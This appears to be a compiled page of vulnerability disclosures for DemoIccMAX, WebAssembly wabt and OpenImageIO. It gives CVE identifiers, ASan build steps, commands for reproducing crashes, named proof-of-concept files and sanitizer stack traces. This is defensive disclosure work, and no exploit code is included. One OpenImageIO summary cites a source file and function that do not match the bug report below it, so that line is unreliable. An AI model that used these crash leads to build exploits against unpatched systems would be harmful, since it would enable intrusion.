    6   libclang_rt.asan_osx_dynamic.dylib	       0x103b1c1dd __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) + 1773
    7   libclang_rt.asan_osx_dynamic.dylib	       0x103b1d448 __asan_report_load4 + 40
    8   libIccProfLib2.2.1.15.dylib   	       0x10365ce45 CIccPRMG::GetChroma(float, float) + 1093 (IccPrmg.cpp:163)
    9   libIccProfLib2.2.1.15.dylib   	       0x10365cefe CIccPRMG::InGamut(float, float, float) + 46 (IccPrmg.cpp:170)
    10  libIccProfLib2.2.1.15.dylib   	       0x10365d152 CIccPRMG::InGamut(float*) + 498 (IccPrmg.cpp:183)
    11  libIccProfLib2.2.1.15.dylib   	       0x10365de41 CIccPRMG::EvaluateProfile(CIccProfile*, icRenderingIntent, icXformInterp, bool) + 3169 (IccPrmg.cpp:240)
    12  libIccProfLib2.2.1.15.dylib   	       0x10365ea4f CIccPRMG::EvaluateProfile(char const*, icRenderingIntent, icXformInterp, bool) + 111 (IccPrmg.cpp:288)
    13  iccRoundTrip                  	       0x102913177 main + 1063 (iccRoundTrip.cpp:177)
    14  dyld                          	    0x7ff80dee53a6 start + 1942
    
    
    Thread 0 crashed with X86 Thread State (64-bit):
      rax: 0x0000000000000000  rbx: 0x0000000000000006  rcx: 0x00007ff7bd5f0ce8  rdx: 0x0000000000000000
      rdi: 0x0000000000000103  rsi: 0x0000000000000006  rbp: 0x00007ff7bd5f0d10  rsp: 0x00007ff7bd5f0ce8
       r8: 0x00001ffef7abe1a0   r9: 0x0000000000000000  r10: 0x0000000000000000  r11: 0x0000000000000246
      r12: 0x0000000000000103  r13: 0x2000000000000000  r14: 0x00007ff851846e80  r15: 0x0000000000000016
      rip: 0x00007ff80e2357a6  rfl: 0x0000000000000246  cr2: 0x0000000103ac44b0
      
    Logical CPU:     0
    Error Code:      0x02000148 
    Trap Number:     133
    
    
    Binary Images:
           0x1034bb000 -        0x103836fff libIccProfLib2.2.1.15.dylib (*) <f2dc6eae-a665-30af-bc63-7f6b8c876dad> /Users/USER/Downloads/*/libIccProfLib2.2.1.15.dylib
           0x103a37000 -        0x103b66fff libclang_rt.asan_osx_dynamic.dylib (*) <b5a35b2f-2e39-33dc-88c4-cd4db0ffc80b> /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/15.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib
           0x10290d000 -        0x102914fff iccRoundTrip (*) <a4db0180-b77f-39cc-bc80-71c3e8b6bbb3> /Users/USER/Downloads/*/iccRoundTrip
        0x7ff80e22d000 -     0x7ff80e267ff7 libsystem_kernel.dylib (*) <3690c1fc-599f-39ff-bbdb-85422e9a996c> /usr/lib/system/libsystem_kernel.dylib
        0x7ff80e268000 -     0x7ff80e273fff libsystem_pthread.dylib (*) <33c43114-85f0-3f32-86d7-8e6a2403d38c> /usr/lib/system/libsystem_pthread.dylib
        0x7ff80e10d000 -     0x7ff80e194fff libsystem_c.dylib (*) <3e9a5bfa-50c0-3a96-9291-4826c62d1182> /usr/lib/system/libsystem_c.dylib
        0x7ff80dedf000 -     0x7ff80df7b2ff dyld (*) <1289b60a-4980-342d-b1a4-250bbee392f1> /usr/lib/dyld
                   0x0 - 0xffffffffffffffff ??? (*) <00000000-0000-0000-0000-000000000000> ???
    
    

**Caveat: Opening Malicious ICC Color Profiles may result in Remote Code Execution in the context of the User**

CVE-2023-46603: Patches for stack buffer overflow at the icFixXml and global buffer overflow in the CIccPRMG::GetChroma functions by xsscx · Pull Request #53 · InternationalColorConsortium/DemoIccMAX

WebAssembly wabt 1.0.33 has an Out-of-Bound Memory Read in in DataSegment::IsValidRange(), which lead to segmentation fault.

**Environment**

OS               : Linux 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux
Commit           : 0e78c24fd231d5ee67ccd271bfa317faa963281c
Version          : 1.0.33 (git~1.0.33-35-gdddc03d3)
Clang Verison    : 12.0.1
Build            : mkdir build && cd build && export CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" && cmake .. && cmake --build .
Affected Tool    : wasm-interp
Enabled Features : None
Impact           : Out-of-Bound Memory Read Access

**Proof of Concept**

poc-wasm-interp-01.zip

**Stack Trace Provide By AddressSanitizer**

$  ~/wabt\_asan/bin/wasm-interp poc.wasm
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3549==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x00000064a0fe bp 0x7ffcceb61670 sp 0x7ffcceb61640 T0)
==3549==The signal is caused by a READ memory access.
==3549==Hint: address points to the zero page.
    #0 0x64a0fe in wabt::interp::DataSegment::IsValidRange(unsigned long, unsigned long) const /home/lain/wabt\_asan/src/interp/interp.cc:734:19
    #1 0x649cd7 in wabt::interp::Memory::Init(unsigned long, wabt::interp::DataSegment const&, unsigned long, unsigned long) /home/lain/wabt\_asan/src/interp/interp.cc:617:11
    #2 0x666cb4 in wabt::interp::Thread::DoMemoryInit(wabt::interp::Instr, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:2075:3
    #3 0x65b199 in wabt::interp::Thread::StepInternal(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1510:32
    #4 0x65352b in wabt::interp::Thread::Run(int, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1086:19
    #5 0x645a70 in wabt::interp::Thread::Run(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1078:14
    #6 0x644caf in wabt::interp::DefinedFunc::DoCall(wabt::interp::Thread&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:428:19
    #7 0x64417d in wabt::interp::Func::Call(wabt::interp::Store&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*, wabt::Stream\*) /home/lain/wabt\_asan/src/interp/interp.cc:394:10
    #8 0x6512e6 in wabt::interp::Instance::Instantiate(wabt::interp::Store&, wabt::interp::Ref, std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> > const&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:944:22
    #9 0x5693e5 in InstantiateModule(std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> >&, wabt::interp::RefPtr<wabt::interp::Module> const&, wabt::interp::RefPtr<wabt::interp::Instance>\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:340:19
    #10 0x562e82 in ReadAndRunModule(char const\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:423:3
    #11 0x561f67 in ProgramMain(int, char\*\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:450:25
    #12 0x563191 in main /home/lain/wabt\_asan/src/tools/wasm-interp.cc:456:10
    #13 0x7f9f8fa00082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #14 0x4845ed in \_start (/home/lain/wabt\_asan/bin/wasm-interp+0x4845ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/lain/wabt\_asan/src/interp/interp.cc:734:19 in wabt::interp::DataSegment::IsValidRange(unsigned long, unsigned long) const
==3549==ABORTING

CVE-2023-46331: Out-of-Bound Memory Read in DataSegment::IsValidRange() · Issue #2310 · WebAssembly/wabt

WebAssembly wabt 1.0.33 contains an Out-of-Bound Memory Write in DataSegment::Drop(), which lead to segmentation fault.

**Environment**

OS               : Linux 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux
Commit           : 0e78c24fd231d5ee67ccd271bfa317faa963281c
Version          : 1.0.33 (git~1.0.33-35-gdddc03d3)
Clang Verison    : 12.0.1
Build            : mkdir build && cd build && export CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" && cmake .. && cmake --build .
Affected Tool    : wasm-interp
Enabled Features : None
Impact           : Out-of-Bound Memory Write Access

**Proof of Concept**

poc-wasm-interp-02.zip

**Stack Trace Provide By AddressSanitizer**

$  ~/wabt\_asan/bin/wasm-interp poc.wasm
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3641==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x00000067f426 bp 0x7ffd04e28310 sp 0x7ffd04e28300 T0)
==3641==The signal is caused by a WRITE memory access.
==3641==Hint: address points to the zero page.
    #0 0x67f426 in wabt::interp::DataSegment::Drop() /home/lain/wabt\_asan/include/wabt/interp/interp-inl.h:906:9
    #1 0x6670be in wabt::interp::Thread::DoDataDrop(wabt::interp::Instr) /home/lain/wabt\_asan/src/interp/interp.cc:2081:33
    #2 0x65b29a in wabt::interp::Thread::StepInternal(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1511:32
    #3 0x65352b in wabt::interp::Thread::Run(int, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1086:19
    #4 0x645a70 in wabt::interp::Thread::Run(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1078:14
    #5 0x644caf in wabt::interp::DefinedFunc::DoCall(wabt::interp::Thread&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:428:19
    #6 0x64417d in wabt::interp::Func::Call(wabt::interp::Store&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*, wabt::Stream\*) /home/lain/wabt\_asan/src/interp/interp.cc:394:10
    #7 0x6512e6 in wabt::interp::Instance::Instantiate(wabt::interp::Store&, wabt::interp::Ref, std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> > const&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:944:22
    #8 0x5693e5 in InstantiateModule(std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> >&, wabt::interp::RefPtr<wabt::interp::Module> const&, wabt::interp::RefPtr<wabt::interp::Instance>\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:340:19
    #9 0x562e82 in ReadAndRunModule(char const\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:423:3
    #10 0x561f67 in ProgramMain(int, char\*\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:450:25
    #11 0x563191 in main /home/lain/wabt\_asan/src/tools/wasm-interp.cc:456:10
    #12 0x7f77c7bdc082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #13 0x4845ed in \_start (/home/lain/wabt\_asan/bin/wasm-interp+0x4845ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/lain/wabt\_asan/include/wabt/interp/interp-inl.h:906:9 in wabt::interp::DataSegment::Drop()
==3641==ABORTING

CVE-2023-46332: Out-of-Bound Memory Write in DataSegment::Drop() · Issue #2311 · WebAssembly/wabt

An issue in OpenImageIO oiio v.2.4.12.0 allows a remote attacker to execute arbitrary code and cause a denial of service via the read_rle_image function of file bifs/unquantize.c

Describe the bug:  
Hi, I found runtime error: signed integer overflow in file src/bmp.imageio/bmpinput.cpp:302

To Reproduce:  
Steps to reproduce the behavior:

1.  CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE\_CXX\_STANDARD=17
2.  make && make install
3.  iconvert --inplace poc.bmp  
    poc file:  
    poc.bmp.zip

Evidence:  
src/bmp.imageio/bmpinput.cpp:302:41: runtime error: signed integer overflow: 10240 \* 276095 cannot be represented in type 'int'  
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /root/fuzz/fuzz\_oiio/oiio/src/bmp.imageio/bmpinput.cpp:302:41 in  
terminate called after throwing an instance of 'std::length\_error'  
what(): vector::\_M\_default\_append  
0# OpenImageIO\_v2\_5\_2::Sysutil::stacktraceabi:cxx11 in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO\_Util.so.2.5.2  
1# 0x00007F5AA4E8B5CC in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO\_Util.so.2.5.2  
2# 0x00007F5AA4532520 in /lib/x86\_64-linux-gnu/libc.so.6  
3# pthread\_kill in /lib/x86\_64-linux-gnu/libc.so.6  
4# raise in /lib/x86\_64-linux-gnu/libc.so.6  
5# abort in /lib/x86\_64-linux-gnu/libc.so.6  
6# 0x00007F5AA48C1B9E in /lib/x86\_64-linux-gnu/libstdc++.so.6  
7# 0x00007F5AA48CD20C in /lib/x86\_64-linux-gnu/libstdc++.so.6  
8# 0x00007F5AA48CD277 in /lib/x86\_64-linux-gnu/libstdc++.so.6  
9# 0x00007F5AA48CD4D8 in /lib/x86\_64-linux-gnu/libstdc++.so.6  
10# std::\_\_throw\_length\_error(char const\*) in /lib/x86\_64-linux-gnu/libstdc++.so.6  
11# 0x00007F5AA64A29AC in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
12# 0x00007F5AA64A2281 in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
13# 0x00007F5AA733A3BB in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
14# 0x00007F5AA73355FE in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
15# 0x00007F5AA7332396 in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
16# OpenImageIO\_v2\_5\_2::ImageInput::create(OpenImageIO\_v2\_5\_2::basic\_string\_view<char, std::char\_traits >, bool, OpenImageIO\_v2\_5\_2::ImageSpec const\*, OpenImageIO\_v2\_5\_2::Filesystem::IOProxy\*, OpenImageIO\_v2\_5\_2::basic\_string\_view<char, std::char\_traits >) in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
17# OpenImageIO\_v2\_5\_2::ImageInput::open(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, OpenImageIO\_v2\_5\_2::ImageSpec const\*, OpenImageIO\_v2\_5\_2::Filesystem::IOProxy\*) in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
18# 0x000055E91B20C502 in ../../../oiio/build/bin/iconvert  
19# 0x000055E91B2133A1 in ../../../oiio/build/bin/iconvert  
20# 0x00007F5AA4519D90 in /lib/x86\_64-linux-gnu/libc.so.6  
21# \_\_libc\_start\_main in /lib/x86\_64-linux-gnu/libc.so.6  
22# 0x000055E91B14BC55 in ../../../oiio/build/bin/iconvert  
Aborted

Platform information:  
OIIO branch/version: 2.4.14.0  
OS: Linux  
C++ compiler: clang-14.0.6

Tag

#c++